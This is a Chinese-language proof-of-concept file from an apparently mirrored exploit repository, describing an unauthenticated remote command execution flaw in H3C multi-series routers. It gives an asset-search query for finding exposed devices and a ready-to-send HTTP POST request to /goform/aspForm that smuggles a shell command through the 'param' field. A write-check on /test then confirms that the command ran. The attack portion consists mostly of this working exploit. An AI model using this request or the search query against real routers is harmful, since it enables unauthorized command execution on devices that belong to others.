admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-07 03:17:07 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/H3C/H3C多系列路由器/H3C多系列路由器存在前台远程命令执行漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.0 KiB
Raw Blame History

H3C多系列路由器存在前台远程命令执行漏洞

一、漏洞简介

H3C多系列路由器存在前台远程命令执行漏洞。

二、影响版本

  • H3C多系列路由器

三、资产测绘

  • hunterapp.name="H3C Router Management"
  • 登录页面

1693536029401-fe49c297-e04b-42c4-8935-a0a3181716cd.png

四、漏洞复现

POST /goform/aspForm HTTP/1.1
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 

CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp&param=1; $(ls>/www/test);

1708148458826-c9fecdad-19a8-4f2f-afb8-2edb86c89119.png

/test

1708148479113-de8c50b3-1388-4543-b5ad-245ab43716a0.png

更新: 2024-02-29 23:57:19
原文: https://www.yuque.com/xiaokp7/ocvun2/tp0a94dpgkk64aqo